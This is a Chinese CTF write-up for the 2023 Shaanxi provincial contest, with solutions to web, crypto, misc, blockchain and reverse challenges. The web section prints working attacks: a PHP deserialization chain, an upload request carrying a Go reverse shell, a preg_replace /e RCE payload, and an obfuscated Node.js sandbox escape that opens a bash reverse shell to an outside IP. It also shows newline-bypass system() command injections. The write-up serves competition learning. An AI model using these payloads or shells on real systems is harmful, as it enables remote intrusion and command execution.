2023陕西省赛

借用了队友整理的wp

WEB

ezpop

访问发现啥也没有，抓包找到js文件

里面有个base64，解密得到路径

从源码里可以看到，我们最终是要getFlag包含文件的，那么需要一个dark对象，如果要执行getFlag的话，需要到day里面的__call方法，而如果我们要调用day的getFlag方法时，因为其不存在，因此会自动调用__invoke，因此我们需要一个light类，而当我们最后将一个对象当作字符串输出时，这里的__toString会被触发，而day类里没有go方法，我们需要一个dark类，最后反序列化被触发的时候首先是__destruct()被调用，因此一开始需要night，根据这么一个逻辑可以写出一条链子

$t=new night();

$t->night=new day();

$t->night->day=new dark();

$t->night->day->dark=new light();

$t->night->day->dark->light=new day();

$t->night->day->dark->light->day=new dark();

$t->night->day->dark->light->day->dark="php://filter/read=convert.base64-encode/resource=/flag";

$c=array($t,0);

echo (serialize($c));

然后就是传参问题了，这里源文件存在unicode的控制符，因此显示的不是正常的pop，复制到sublime里面就可以看到其实是

直接复制这串为参数然后传参

最后面还有个..过滤，用php伪协议即可

flag{0c13bf3aa95c387e98d90a13fbbe2ec1}

test

隐藏按钮

admin下找到密码asdfgh123

网上找个go的反弹shell，手动写个上传接口传上去

POST /Adm1nUp104d HTTP/1.1
Host: 8e50756d.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8e50756d.clsadp.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="file"; filename="123.go"
Content-Type: application/octet-stream

package main
import (
    "io"
    "net"
    "io/ioutil"
    "log"
    "os/exec" 
)
 
var (
    cmd string
    line string
)
 
func main() {
    addr := "xxxx:8999"
    conn,err := net.Dial("tcp",addr)
    if err != nil {
        log.Fatal(err)
    }
 
    buf := make([]byte,10240)
    for  {
        n,err := conn.Read(buf)
        if err != nil && err != io.EOF {
            log.Fatal(err)
        }
 
        cmd_str := string(buf[:n])
        cmd := exec.Command("/bin/bash","-c",cmd_str)
        stdout, err := cmd.StdoutPipe()
        if err != nil {
            log.Fatal(err)
        }
        defer stdout.Close()
        if err := cmd.Start(); err != nil {
            log.Fatal(err)
        }
        opBytes, err := ioutil.ReadAll(stdout)
        if err != nil {
            log.Fatal(err)
        }
        conn.Write([]byte(opBytes))
    }
}
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="submit"

submit_file
------WebKitFormBoundarydX4dGEAJZUS6ZqkT--

ezrce

交key拿到源码

通过检测name中是否存在hahaha来进行正则匹配，因为使用了/e字符，所以在$replacement地方就相当于eval执行语句，(25条消息) preg_replace() /e代码执行漏洞_2021！的博客-CSDN博客https://xz.aliyun.com/t/9360)

php无参rcePHP的无参数RCE - 先知社区 (aliyun.com)

name=hahaha&qaq=show_source%28session_id%28session_start%28%29%29%29%3B

Esc4pe_T0_Mong0

Read Source Code拿到源码

过滤比较多，也有长度的限制，用fromCharCode减少payload长度，利用this.constructor.constructor 进行沙箱逃逸，利用with绕过对.的过滤

最终payload

with(String)with(f=fromCharCode,this)with(constructor)with(constructor(f(r=114,e=101,t=116,117,r,110,32,p=112,r,111,c=99,e,s=115,s))())with(mainModule)with(require(f(c,h=104,105,108,100,95,p,r,111,c,e,s,s)))exec(f(98,97,s,h,32,45,c,32,34,98,97,s,h,32,45,105,32,62,38,32,47,100,e,118,47,t,c,p,47,a=56,b=49,46,54,a,46,b,50,48,46,b,52,47,a,a,a,57,32,48,62,38,b,34))

接到shell之后根据前面注释的提示猜测flag在mongodb里，读一下flag

unserialize

%0a直接非预期绕过

a=system%0a('ls');

a=system%0a('ls /');
a=system%0a('cat /flag');

Blockchain

被销毁的flag

交易自毁，找一下创建交易

Online Solidity Decompiler (ethervm.io)反编译

Crypto

奇怪的sar

lcg算seed

n =  137670797028117726329534659376416493367957852768263083700434198723955223922183386928456013703791817601151754417828367188186912209697081337658512940425529211281290630976671911327606706953154608427885071841566358882014021242768190762103365969320014710368160869517966437591299370072284930202718943785099916898209
enc =  [101737402423360536260958229788866250367716256968287178187558336481872788309727545478736771692477306412259739856568227009850831432381180909815512654609798228982433082928392936844193974517574281026029228179913579225687286945054175762659252515268270399329404664775893089132101252158524000295899895962104782878103, 37355684997487259669354747104430314505839306993101096210478266975184357608742619438151118843905165289324251734149329596611854110739738607745107961453008343886403511257039401245484528985856920723694142989180291902939107642020398816995584650913417698279936585230648639613028793148102494100898288564799111024672, 58677759595639211550435023449462812079890625834313820227189340593596480924226619376872336960357021314847975570175387751632125898437020801920862764666175594874885587518469384576361008639967382152477408865298759987606155830674598034578657554841283906976808719095766296677147076808250022898199866472085742989883, 61841632061818470036288407041172200048676249787061823756736224887116113640875444187463656719652972233582538657844183320242896612625995507633237074900538692102956750184024574603018257213912795847625926653585010890014291951218199774765624860625726555381815237888483974246173727262881650634287497285246796321130, 7618244158597756867387754433401378508070531356170836765779245254233413235386172690733378371343899289510629513166609513857423499004879497768588665836034791151090648182168421570449377835494883902907064269417199065924565304966242954268460876762295575715334403142360198583318323418975108290758222653083011275844, 106276841058222138994123556391380518368163552919305398852484130331884811278068151915582752795463570013359693610495645946230044828403849434903415989487924763756589202218361370725532394478569304449884620166937809374355282324069422109879874964479199929174533104879048175102339134830614476339153367475243140156049, 54574757236475194407137831004617398270525645136836468973535243574661043352422598443323384197261529289829451787586618886007968913414366545291507686451774653217577858375086817168124727394445167274831801876424578654786480330913650363551771258617533162477541882336257099777912519011890593910515860435759936717781, 15567087904962670212229825713697043597876172881256160613623383896576159414077875401117959132252949501643234465895697270909085179587988268864498823765197994781747034644583869111599516151129007414228897958635533561248099927507725880289417298814703767549313482346652043188826434944367260731729064673486516315207, 10757138067445225320504771816863593606847219020279502671965413470243269270456133564739090471033889069283122519782525412134604896073598293410977787230108853737796640474070194546344190858079847734817109910030714675258996740807873872365037296486121580542250452443305370358407408558223735250474249180772656905880, 68097848963949068260912124852455363245291187860801223898468533992003737157497436432969031551088942445561676359631354280979357356539429863946694570097104716411407829017684705171462511875250672979623888463245258237680782731827727876526411531354910982579164963119481534453651300645314177478026462894232377307020]
MMI = lambda A, n,s=1,t=0,N=0: (n < 2 and t%N or MMI(n, A%n, t, s-A//n*t, N or n),-1)[n<1] #逆元计算
a=(enc[2]-enc[1])*MMI((enc[1]-enc[0]),n)%n
ani=MMI(a,n)
b=(enc[1]-a*enc[0])%n
seed = (ani*(enc[0]-b))%n
print(seed)

dfs深搜p，q

import gmpy2
from Crypto.Util.number import *
import sys
sys.setrecursionlimit(3000)
RSA1 = 24044063028844014127418595700558729326190738802687551098858513077613750188240082663594575453404975706225242363463089392757425008423696150244560748490108425645064339883915929498539109384801415313004805586193044292137299902797522618277016789979196782551492020031695781792205215671106103568559626617762521687128199445018651010056934305055040748892733145467040663073395258760159451903432330506383025685265502086582538667772105057401245864822281535425692919273252955571196166824113519446568745718898654447958192533288063735350717599092500158028352667339959012630051251024677881674246253876293205648190626145653304572328397
RSA2 = 39428646082513135314545544161912595458975375891528176714825766497155482031976852156313956476772023258684487799640179241987139554034654104867011313090105438798561154654679825702410748780286094326639330840289843154525176685892323447168072417654823748596238888125898914210332775882916911771786984574407163323116

def findp(p,q):
    if len(p)==1024:
        pp=int(p,2)
        if RSA1%pp==0:
            print(pp)
            print(RSA1//pp)
    else:
        l=len(p)
        pp=int(p,2)
        qq=int(q,2)
        if (pp^qq)%(2**l)==RSA2%(2**l) and pp*qq%(2**l)==RSA1%(2**l):
            findp('1'+p,'1'+q)
            findp('1'+p,'0'+q)
            findp('0'+p,'1'+q)
            findp('0'+p,'0'+q)
findp('1','1')
p = 136684274356315612487659217209422309110679526145315687701807802133803279866185818899991993884467313793599158843950483228582160463511388849758567202472905559846777250024605202939046541380251340624743050639969339200934727970697454003281829379562185118379160449090683059062519707425788095221998247228048681125693
q = 175909504894211247364395617174091428768974985846552891279489073681785877028619520625043017232062800318796180901847503827906224008040782018396669843628458963255715414759414738416930428210387093039711088082737992450479987000339480311499183821667504225082440337907962316839883506834373795587694663967806384498129

e = 65537
c =  14883053247652228283811442762780942186987432684268901119544211089991663825267989728286381980568977804079766160707988623895155236079459150322336701772385709429870215701045797411519212730389048862111088898917402253368572002593328131895422933030329446097639972123501482601377059155708292321789694103528266681104521268192526745361895856566384239849048923482217529011549596939269967690907738755747213669693953769070736092857407573675987242774763239531688324956444305397953424851627349331117467417542814921554060612622936755420459029769026126293588814831034143264949347763031994934813475762839410192390466491651507733968227

phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
print(long_to_bytes(pow(c,d,RSA1)))
#flag{y0u_kn0w_Pruning_and_lcg}

HaM3

改编(25条消息) 第四届美团网络安全高校挑战赛_hamburgerRSA_M3ng@L的博客-CSDN博客

import Crypto.Util.number

def decrypt_RSA(c, e, p, q):
    phi = (p-1) * (q-1)
    d = Crypto.Util.number.inverse(e, phi)
    m = pow(c, d, p*q)
    print(Crypto.Util.number.long_to_bytes(m))

n = 177269125756508652546242326065138402971542751112423326033880862868822164234452280738170245589798474033047460920552550018968571267978283756742722231922451193
c = 47718022601324543399078395957095083753201631332808949406927091589044837556469300807728484035581447960954603540348152501053100067139486887367207461593404096
e = 65537

# 爆破p,q
low = str(n)[-19:]
high = str(n)[:19]
for i in range(10):
    print(int(high + str(i) + low))

# 解密
p = 9788542938580474429
q = 18109858317913867117
P = int(str(p) + str(p))
Q = int(str(q) + str(q))
PP = int(str(P) + str(Q))
QQ = int(str(Q) + str(P))
N = PP * QQ

if N == n:
    decrypt_RSA(c, e, PP, QQ)
else:
    print("error")

Misc

你是不是很疑惑呢

aztec条形码

提示时间

发现时间创建时间和修改时间异常

根据题目名，转时间戳后异或

中文数字转阿拉伯后按顺序转ascii得到flag

import os
import re
def chinese_to_arabic(chinese_number):
    mapping = {
        '零': 0,
        '壹': 1,
        '贰': 2,
        '叁': 3,
        '肆': 4,
        '伍': 5,
        '陆': 6,
        '柒': 7,
        '捌': 8,
        '玖': 9,
        '拾': 10,
    }

    pattern = re.compile(r'[零壹贰叁肆伍陆柒捌玖拾佰仟万亿]')
    matches = pattern.findall(chinese_number)

    total = 0
    current = 0
    for char in matches:
        value = mapping[char]
        if value >= 10:
            if current == 0:
                current = value
            else:
                current *= value
        else:
            current += value
            if current >= 10:
                total += current
                current = 0

    return total + current

# 获取当前目录路径
folder_path = os.getcwd()

# 获取当前目录下的所有文件名
file_names = os.listdir(folder_path)
# print(file_names)
# 仅保留后缀为 .png 的文件名，并将中文数字转换为阿拉伯数字
number_file_mapping = {}
for filename in file_names:
    if filename.endswith('.png'):
        chinese_num = filename.split('.')[0]
        number = chinese_to_arabic(chinese_num)
        number_file_mapping[number] = filename

# 按数字的大小顺序遍历文件名
sorted_numbers = sorted(number_file_mapping.keys())
for number in sorted_numbers:
    filename = number_file_mapping[number]
    file_path = os.path.join(folder_path, filename)

    # 获取文件的创建时间和修改时间的时间戳
    create_time = int(os.path.getctime(file_path))
    modify_time = int(os.path.getmtime(file_path))

    # 异或运算
    xor_result = create_time ^ modify_time
    print(chr(xor_result),end='')
#flag{Tim3_1s_a_w0nd3rfuL_Th1ng_alright}

管道

zsteg出

flag{0988f2a657d8936a76876d4f39f7d7a0}

可是雪啊飘进双眼

hint.wav末尾找到摩斯

解密得到WOAISHANXI

snow隐写，得到shanxiroujiamo

解开压缩包

key.jpg末尾分离压缩包

得到2.jpg和key.jpg对照得到密码BC1PVEYD

steghide得到flag

flag{d2d2835882495f4e39ecce6847e78f86}

Findme

crc块有问题，手动提取data

大小整数

猜测vc容器，用之前的图片密钥挂载

得到全是0和255

转16进制后放入gimp得到二维码，扫码得到flag

with open('flag.txt', 'r') as file:
    data = file.read()

hex_data = ''.join([hex(int(value))[2:].zfill(2) for value in data.split(',')])
print(hex_data)

REVERSE

我的upx -d怎么坏了

程序不止upx特征码被修改了，一些区段也被改了，那就手动脱壳吧

x32dbg打开，点击运行，跳过ntdll的加载，等到程序输出Please input your flag:后，定位字符串

追踪过去后往上翻，找到运行入口

然后用插件Scylla来dump出这段

dump到一个程序，然后ida就可以正常分析了

发现是个迷宫题

从S走到#即可，根据提示，选择最短路径md5即可

flag{ae2de0be8285f69db701d4dba8721a40}

babypython

这题算是运气好，猜的比较准

前面都是一些加载库的东西，不用看

这里可以看出来是flag每一位都异或8

下面这些计算什么的也不用管

这里又是关键，是flag每一位加三

中间有一大段计算的那些都没看，直接看到最后的替换了

下面程序就结束了

总体来看到的话，就是flag每一位先异或8，再加3，最后有个base64加密后替换输出

但是我们发现如果这样逆的话，是不能正常输出的

看到替换后的结果，可以看到字符串比较像是被reverse了一样，因此我就尝试倒一下，然后就出了

flag{5dcbafe63fbf3b7d8647c1aee650ae9c}